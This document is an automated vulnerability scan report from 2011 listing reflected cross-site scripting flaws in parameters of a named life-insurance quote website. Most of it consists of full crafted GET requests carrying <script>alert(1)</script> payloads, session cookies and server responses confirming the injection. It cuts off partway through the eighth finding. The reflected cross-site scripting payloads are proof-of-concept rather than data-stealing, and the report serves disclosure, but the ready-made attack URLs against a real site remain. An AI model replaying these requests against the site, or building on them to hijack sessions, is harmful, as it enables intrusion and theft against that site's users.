XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, accuquotelife.com

Report generated by XSS.CX at Thu Aug 18 08:43:16 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (reflected)

XSS in accuquotelife.com, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86

1.1. http://www.accuquotelife.com/apply.cfm [Catagory parameter]

1.2. http://www.accuquotelife.com/apply.cfm [Category parameter]

1.3. http://www.accuquotelife.com/apply.cfm [Category parameter]

1.4. http://www.accuquotelife.com/apply.cfm [Company parameter]

1.5. http://www.accuquotelife.com/apply.cfm [Company parameter]

1.6. http://www.accuquotelife.com/apply.cfm [CompanyRateClass parameter]

1.7. http://www.accuquotelife.com/apply.cfm [Email parameter]

1.8. http://www.accuquotelife.com/apply.cfm [FaceAmountID parameter]

1.9. http://www.accuquotelife.com/apply.cfm [FaceAmountValue parameter]

1.10. http://www.accuquotelife.com/apply.cfm [FirstName parameter]

1.11. http://www.accuquotelife.com/apply.cfm [Health parameter]

1.12. http://www.accuquotelife.com/apply.cfm [LastName parameter]

1.13. http://www.accuquotelife.com/apply.cfm [LeadQuoteID parameter]

1.14. http://www.accuquotelife.com/apply.cfm [Premium parameter]

1.15. http://www.accuquotelife.com/apply.cfm [Premium parameter]

1.16. http://www.accuquotelife.com/apply.cfm [Product parameter]

1.17. http://www.accuquotelife.com/apply.cfm [Product parameter]

1.18. http://www.accuquotelife.com/apply.cfm [Product parameter]

1.19. http://www.accuquotelife.com/apply.cfm [ShortLeadID parameter]

1.20. http://www.accuquotelife.com/apply.cfm [TobaccoUseTypeID parameter]

1.21. http://www.accuquotelife.com/quote_results.cfm [Email parameter]

1.22. http://www.accuquotelife.com/quote_results.cfm [FirstName parameter]

1.23. http://www.accuquotelife.com/quote_results.cfm [LastName parameter]

2. Cross-domain script include

2.1. http://www.accuquotelife.com/

2.2. http://www.accuquotelife.com/apply.cfm

2.3. http://www.accuquotelife.com/index11b.cfm

2.4. http://www.accuquotelife.com/quote_results.cfm

3. Email addresses disclosed

3.1. http://www.accuquotelife.com/apply.cfm

3.2. http://www.accuquotelife.com/jscript/control.2/s_code.js

3.3. http://www.accuquotelife.com/quote_results.cfm



1. Cross-site scripting (reflected)  next
There are 23 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.accuquotelife.com/apply.cfm [Catagory parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accuquotelife.com
Path:   /apply.cfm

Issue detail

The value of the Catagory request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d08c8"><script>alert(1)</script>7cd7b05a60794172a was submitted in the Catagory parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /apply.cfm?FirstName=xss&LastName=cdd&DayTimePhone=2125551212&EveningPhone=&CellPhone=&Email=xss%40accuquote.com&BirthMonth=1&BirthDay=01&BirthYear=1970&Sex=2&Health=477&TobaccoUseTypeID=10&StateID=1&Catagory=7d08c8"><script>alert(1)</script>7cd7b05a60794172a&FaceAmountID=19&Product=OPTerm+30+-+30+Year+Term&Premium=1105.0000&Company=Banner+Life+Insurance+Company&Category=30+Year+Level+Term+Guaranteed&FaceAmountValue=1000000&CompanyRateClass=Preferred+Plus+Non-Smoker&LeadQuoteID=8589465&ShortLeadID=10868858&image.x=75&image.y=24&image=Request+Application HTTP/1.1
Host: www.accuquotelife.com
Proxy-Connection: keep-alive
Referer: http://www.accuquotelife.com/quote_results.cfm
Cache-Control: max-age=0
Origin: http://www.accuquotelife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=180581568; CFTOKEN=69801649; REFDIR=; L1247=1.1313764594323; __qca=P0-1874889852-1313678195779; CT_ENTRYURL=http%3A//www.accuquotelife.com/index11b.cfm; CT_CrtDate=8/18/2011%209%3A36%3A35; CT_UID=1313678196043.028; __utma=73665026.1993080573.1313678198.1313678198.1313678198.1; __utmb=73665026.1.10.1313678198; __utmc=73665026; __utmz=73665026.1313678198.1.1.utmcsr=accuquotelife.com|utmccn=(referral)|utmcmd=referral|utmcct=/; mbox=session#1313678182912-659761#1313680127|PC#1313678182912-659761.19#1314887867|check#true#1313678327; s_cc=true; CT_CID=DIRECT; CT_KWD=; CT_AD=; CT_ADGROUP=; CT_MATCH=; CT_REF=http%3A//accuquotelife.com/; CT_TestId=0; CT_Plmnt=; CT_Type=1; s_sq=accuquotelifeproduction%3D%2526pid%253DQuote%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.accuquotelife.com/images/control.2/btn-requestapp.jpg%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 18 Aug 2011 14:38:16 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: {ts '2011-08-18 09:38:16'}
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 44644


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
<input type="hidden" name="Catagory" id="Catagory" value="7d08c8"><script>alert(1)</script>7cd7b05a60794172a" />
...[SNIP]...

1.2. http://www.accuquotelife.com/apply.cfm [Category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accuquotelife.com
Path:   /apply.cfm

Issue detail

The value of the Category request parameter is copied into the HTML document as plain text between tags. The payload 113a0<script>alert(1)</script>63bc4d18f7ef4a3a3 was submitted in the Category parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /apply.cfm?FirstName=xss&LastName=cdd&DayTimePhone=2125551212&EveningPhone=&CellPhone=&Email=xss%40accuquote.com&BirthMonth=1&BirthDay=01&BirthYear=1970&Sex=2&Health=477&TobaccoUseTypeID=10&StateID=1&Catagory=7&FaceAmountID=19&Product=OPTerm+30+-+30+Year+Term&Premium=1105.0000&Company=Banner+Life+Insurance+Company&Category=30+Year+Level+Term+Guaranteed113a0<script>alert(1)</script>63bc4d18f7ef4a3a3&FaceAmountValue=1000000&CompanyRateClass=Preferred+Plus+Non-Smoker&LeadQuoteID=8589465&ShortLeadID=10868858&image.x=75&image.y=24&image=Request+Application HTTP/1.1
Host: www.accuquotelife.com
Proxy-Connection: keep-alive
Referer: http://www.accuquotelife.com/quote_results.cfm
Cache-Control: max-age=0
Origin: http://www.accuquotelife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=180581568; CFTOKEN=69801649; REFDIR=; L1247=1.1313764594323; __qca=P0-1874889852-1313678195779; CT_ENTRYURL=http%3A//www.accuquotelife.com/index11b.cfm; CT_CrtDate=8/18/2011%209%3A36%3A35; CT_UID=1313678196043.028; __utma=73665026.1993080573.1313678198.1313678198.1313678198.1; __utmb=73665026.1.10.1313678198; __utmc=73665026; __utmz=73665026.1313678198.1.1.utmcsr=accuquotelife.com|utmccn=(referral)|utmcmd=referral|utmcct=/; mbox=session#1313678182912-659761#1313680127|PC#1313678182912-659761.19#1314887867|check#true#1313678327; s_cc=true; CT_CID=DIRECT; CT_KWD=; CT_AD=; CT_ADGROUP=; CT_MATCH=; CT_REF=http%3A//accuquotelife.com/; CT_TestId=0; CT_Plmnt=; CT_Type=1; s_sq=accuquotelifeproduction%3D%2526pid%253DQuote%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.accuquotelife.com/images/control.2/btn-requestapp.jpg%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 18 Aug 2011 14:38:38 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: {ts '2011-08-18 09:38:37'}
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 44689


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
</strong> OPTerm 30 - 30 Year Term product. This is $1,000,000.00 of 30 Year Level Term Guaranteed113a0<script>alert(1)</script>63bc4d18f7ef4a3a3 coverage.</p>
...[SNIP]...

1.3. http://www.accuquotelife.com/apply.cfm [Category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accuquotelife.com
Path:   /apply.cfm

Issue detail

The value of the Category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcb4b"><script>alert(1)</script>d352dc36f536762d6 was submitted in the Category parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /apply.cfm?FirstName=xss&LastName=cdd&DayTimePhone=2125551212&EveningPhone=&CellPhone=&Email=xss%40accuquote.com&BirthMonth=1&BirthDay=01&BirthYear=1970&Sex=2&Health=477&TobaccoUseTypeID=10&StateID=1&Catagory=7&FaceAmountID=19&Product=OPTerm+30+-+30+Year+Term&Premium=1105.0000&Company=Banner+Life+Insurance+Company&Category=30+Year+Level+Term+Guaranteeddcb4b"><script>alert(1)</script>d352dc36f536762d6&FaceAmountValue=1000000&CompanyRateClass=Preferred+Plus+Non-Smoker&LeadQuoteID=8589465&ShortLeadID=10868858&image.x=75&image.y=24&image=Request+Application HTTP/1.1
Host: www.accuquotelife.com
Proxy-Connection: keep-alive
Referer: http://www.accuquotelife.com/quote_results.cfm
Cache-Control: max-age=0
Origin: http://www.accuquotelife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=180581568; CFTOKEN=69801649; REFDIR=; L1247=1.1313764594323; __qca=P0-1874889852-1313678195779; CT_ENTRYURL=http%3A//www.accuquotelife.com/index11b.cfm; CT_CrtDate=8/18/2011%209%3A36%3A35; CT_UID=1313678196043.028; __utma=73665026.1993080573.1313678198.1313678198.1313678198.1; __utmb=73665026.1.10.1313678198; __utmc=73665026; __utmz=73665026.1313678198.1.1.utmcsr=accuquotelife.com|utmccn=(referral)|utmcmd=referral|utmcct=/; mbox=session#1313678182912-659761#1313680127|PC#1313678182912-659761.19#1314887867|check#true#1313678327; s_cc=true; CT_CID=DIRECT; CT_KWD=; CT_AD=; CT_ADGROUP=; CT_MATCH=; CT_REF=http%3A//accuquotelife.com/; CT_TestId=0; CT_Plmnt=; CT_Type=1; s_sq=accuquotelifeproduction%3D%2526pid%253DQuote%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.accuquotelife.com/images/control.2/btn-requestapp.jpg%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 18 Aug 2011 14:38:37 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: {ts '2011-08-18 09:38:37'}
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 44693


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
<input type="hidden" name="Category" id="Category" value="30 Year Level Term Guaranteeddcb4b"><script>alert(1)</script>d352dc36f536762d6" />
...[SNIP]...

1.4. http://www.accuquotelife.com/apply.cfm [Company parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accuquotelife.com
Path:   /apply.cfm

Issue detail

The value of the Company request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8a39"><script>alert(1)</script>93f38772093c9c562 was submitted in the Company parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /apply.cfm?FirstName=xss&LastName=cdd&DayTimePhone=2125551212&EveningPhone=&CellPhone=&Email=xss%40accuquote.com&BirthMonth=1&BirthDay=01&BirthYear=1970&Sex=2&Health=477&TobaccoUseTypeID=10&StateID=1&Catagory=7&FaceAmountID=19&Product=OPTerm+30+-+30+Year+Term&Premium=1105.0000&Company=Banner+Life+Insurance+Companyb8a39"><script>alert(1)</script>93f38772093c9c562&Category=30+Year+Level+Term+Guaranteed&FaceAmountValue=1000000&CompanyRateClass=Preferred+Plus+Non-Smoker&LeadQuoteID=8589465&ShortLeadID=10868858&image.x=75&image.y=24&image=Request+Application HTTP/1.1
Host: www.accuquotelife.com
Proxy-Connection: keep-alive
Referer: http://www.accuquotelife.com/quote_results.cfm
Cache-Control: max-age=0
Origin: http://www.accuquotelife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=180581568; CFTOKEN=69801649; REFDIR=; L1247=1.1313764594323; __qca=P0-1874889852-1313678195779; CT_ENTRYURL=http%3A//www.accuquotelife.com/index11b.cfm; CT_CrtDate=8/18/2011%209%3A36%3A35; CT_UID=1313678196043.028; __utma=73665026.1993080573.1313678198.1313678198.1313678198.1; __utmb=73665026.1.10.1313678198; __utmc=73665026; __utmz=73665026.1313678198.1.1.utmcsr=accuquotelife.com|utmccn=(referral)|utmcmd=referral|utmcct=/; mbox=session#1313678182912-659761#1313680127|PC#1313678182912-659761.19#1314887867|check#true#1313678327; s_cc=true; CT_CID=DIRECT; CT_KWD=; CT_AD=; CT_ADGROUP=; CT_MATCH=; CT_REF=http%3A//accuquotelife.com/; CT_TestId=0; CT_Plmnt=; CT_Type=1; s_sq=accuquotelifeproduction%3D%2526pid%253DQuote%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.accuquotelife.com/images/control.2/btn-requestapp.jpg%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 18 Aug 2011 14:38:35 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: {ts '2011-08-18 09:38:35'}
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 44693


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
<input type="hidden" name="Company" id="Company" value="Banner Life Insurance Companyb8a39"><script>alert(1)</script>93f38772093c9c562" />
...[SNIP]...

1.5. http://www.accuquotelife.com/apply.cfm [Company parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accuquotelife.com
Path:   /apply.cfm

Issue detail

The value of the Company request parameter is copied into the HTML document as plain text between tags. The payload 6d1fb<script>alert(1)</script>5e4f2e03c6e77bc45 was submitted in the Company parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /apply.cfm?FirstName=xss&LastName=cdd&DayTimePhone=2125551212&EveningPhone=&CellPhone=&Email=xss%40accuquote.com&BirthMonth=1&BirthDay=01&BirthYear=1970&Sex=2&Health=477&TobaccoUseTypeID=10&StateID=1&Catagory=7&FaceAmountID=19&Product=OPTerm+30+-+30+Year+Term&Premium=1105.0000&Company=Banner+Life+Insurance+Company6d1fb<script>alert(1)</script>5e4f2e03c6e77bc45&Category=30+Year+Level+Term+Guaranteed&FaceAmountValue=1000000&CompanyRateClass=Preferred+Plus+Non-Smoker&LeadQuoteID=8589465&ShortLeadID=10868858&image.x=75&image.y=24&image=Request+Application HTTP/1.1
Host: www.accuquotelife.com
Proxy-Connection: keep-alive
Referer: http://www.accuquotelife.com/quote_results.cfm
Cache-Control: max-age=0
Origin: http://www.accuquotelife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=180581568; CFTOKEN=69801649; REFDIR=; L1247=1.1313764594323; __qca=P0-1874889852-1313678195779; CT_ENTRYURL=http%3A//www.accuquotelife.com/index11b.cfm; CT_CrtDate=8/18/2011%209%3A36%3A35; CT_UID=1313678196043.028; __utma=73665026.1993080573.1313678198.1313678198.1313678198.1; __utmb=73665026.1.10.1313678198; __utmc=73665026; __utmz=73665026.1313678198.1.1.utmcsr=accuquotelife.com|utmccn=(referral)|utmcmd=referral|utmcct=/; mbox=session#1313678182912-659761#1313680127|PC#1313678182912-659761.19#1314887867|check#true#1313678327; s_cc=true; CT_CID=DIRECT; CT_KWD=; CT_AD=; CT_ADGROUP=; CT_MATCH=; CT_REF=http%3A//accuquotelife.com/; CT_TestId=0; CT_Plmnt=; CT_Type=1; s_sq=accuquotelifeproduction%3D%2526pid%253DQuote%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.accuquotelife.com/images/control.2/btn-requestapp.jpg%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 18 Aug 2011 14:38:36 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: {ts '2011-08-18 09:38:36'}
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 44689


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
<strong>Banner Life Insurance Company6d1fb<script>alert(1)</script>5e4f2e03c6e77bc45</strong>
...[SNIP]...

1.6. http://www.accuquotelife.com/apply.cfm [CompanyRateClass parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accuquotelife.com
Path:   /apply.cfm

Issue detail

The value of the CompanyRateClass request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d153"><script>alert(1)</script>e0d5ef44a21322ab7 was submitted in the CompanyRateClass parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /apply.cfm?FirstName=xss&LastName=cdd&DayTimePhone=2125551212&EveningPhone=&CellPhone=&Email=xss%40accuquote.com&BirthMonth=1&BirthDay=01&BirthYear=1970&Sex=2&Health=477&TobaccoUseTypeID=10&StateID=1&Catagory=7&FaceAmountID=19&Product=OPTerm+30+-+30+Year+Term&Premium=1105.0000&Company=Banner+Life+Insurance+Company&Category=30+Year+Level+Term+Guaranteed&FaceAmountValue=1000000&CompanyRateClass=Preferred+Plus+Non-Smoker4d153"><script>alert(1)</script>e0d5ef44a21322ab7&LeadQuoteID=8589465&ShortLeadID=10868858&image.x=75&image.y=24&image=Request+Application HTTP/1.1
Host: www.accuquotelife.com
Proxy-Connection: keep-alive
Referer: http://www.accuquotelife.com/quote_results.cfm
Cache-Control: max-age=0
Origin: http://www.accuquotelife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=180581568; CFTOKEN=69801649; REFDIR=; L1247=1.1313764594323; __qca=P0-1874889852-1313678195779; CT_ENTRYURL=http%3A//www.accuquotelife.com/index11b.cfm; CT_CrtDate=8/18/2011%209%3A36%3A35; CT_UID=1313678196043.028; __utma=73665026.1993080573.1313678198.1313678198.1313678198.1; __utmb=73665026.1.10.1313678198; __utmc=73665026; __utmz=73665026.1313678198.1.1.utmcsr=accuquotelife.com|utmccn=(referral)|utmcmd=referral|utmcct=/; mbox=session#1313678182912-659761#1313680127|PC#1313678182912-659761.19#1314887867|check#true#1313678327; s_cc=true; CT_CID=DIRECT; CT_KWD=; CT_AD=; CT_ADGROUP=; CT_MATCH=; CT_REF=http%3A//accuquotelife.com/; CT_TestId=0; CT_Plmnt=; CT_Type=1; s_sq=accuquotelifeproduction%3D%2526pid%253DQuote%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.accuquotelife.com/images/control.2/btn-requestapp.jpg%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 18 Aug 2011 14:38:43 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: {ts '2011-08-18 09:38:43'}
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 44644


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
<input type="hidden" name="CompanyRateClass" id="CompanyRateClass" value="Preferred Plus Non-Smoker4d153"><script>alert(1)</script>e0d5ef44a21322ab7" />
...[SNIP]...

1.7. http://www.accuquotelife.com/apply.cfm [Email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accuquotelife.com
Path:   /apply.cfm

Issue detail

The value of the Email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aa44"><script>alert(1)</script>499ad60928a96e53e was submitted in the Email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /apply.cfm?FirstName=xss&LastName=cdd&DayTimePhone=2125551212&EveningPhone=&CellPhone=&Email=xss%40accuquote.com7aa44"><script>alert(1)</script>499ad60928a96e53e&BirthMonth=1&BirthDay=01&BirthYear=1970&Sex=2&Health=477&TobaccoUseTypeID=10&StateID=1&Catagory=7&FaceAmountID=19&Product=OPTerm+30+-+30+Year+Term&Premium=1105.0000&Company=Banner+Life+Insurance+Company&Category=30+Year+Level+Term+Guaranteed&FaceAmountValue=1000000&CompanyRateClass=Preferred+Plus+Non-Smoker&LeadQuoteID=8589465&ShortLeadID=10868858&image.x=75&image.y=24&image=Request+Application HTTP/1.1
Host: www.accuquotelife.com
Proxy-Connection: keep-alive
Referer: http://www.accuquotelife.com/quote_results.cfm
Cache-Control: max-age=0
Origin: http://www.accuquotelife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=180581568; CFTOKEN=69801649; REFDIR=; L1247=1.1313764594323; __qca=P0-1874889852-1313678195779; CT_ENTRYURL=http%3A//www.accuquotelife.com/index11b.cfm; CT_CrtDate=8/18/2011%209%3A36%3A35; CT_UID=1313678196043.028; __utma=73665026.1993080573.1313678198.1313678198.1313678198.1; __utmb=73665026.1.10.1313678198; __utmc=73665026; __utmz=73665026.1313678198.1.1.utmcsr=accuquotelife.com|utmccn=(referral)|utmcmd=referral|utmcct=/; mbox=session#1313678182912-659761#1313680127|PC#1313678182912-659761.19#1314887867|check#true#1313678327; s_cc=true; CT_CID=DIRECT; CT_KWD=; CT_AD=; CT_ADGROUP=; CT_MATCH=; CT_REF=http%3A//accuquotelife.com/; CT_TestId=0; CT_Plmnt=; CT_Type=1; s_sq=accuquotelifeproduction%3D%2526pid%253DQuote%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.accuquotelife.com/images/control.2/btn-requestapp.jpg%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 18 Aug 2011 14:38:13 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: {ts '2011-08-18 09:38:13'}
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 42698


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
<input name="Email" id="Email" type="text" size="20" maxlength="50" value="xss@accuquote.com7aa44"><script>alert(1)</script>499ad60928a96e53e" />
...[SNIP]...

1.8. http://www.accuquotelife.com/apply.cfm [FaceAmountID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accuquotelife.com
Path:   /apply.cfm

Issue detail

The value of the FaceAmountID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8724b"><script>alert(1)</script>5076b283d0edc1a56 was submitted in the FaceAmountID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /apply.cfm?FirstName=xss&LastName=cdd&DayTimePhone=2125551212&EveningPhone=&CellPhone=&Email=xss%40accuquote.com&BirthMonth=1&BirthDay=01&BirthYear=1970&Sex=2&Health=477&TobaccoUseTypeID=10&StateID=1&Catagory=7&FaceAmountID=198724b"><script>alert(1)</script>5076b283d0edc1a56&Product=OPTerm+30+-+30+Year+Term&Premium=1105.0000&Company=Banner+Life+Insurance+Company&Category=30+Year+Level+Term+Guaranteed&FaceAmountValue=1000000&CompanyRateClass=Preferred+Plus+Non-Smoker&LeadQuoteID=8589465&ShortLeadID=10868858&image.x=75&image.y=24&image=Request+Application HTTP/1.1
Host: www.accuquotelife.com
Proxy-Connection: keep-alive
Referer: http://www.accuquotelife.com/quote_results.cfm
Cache-Control: max-age=0
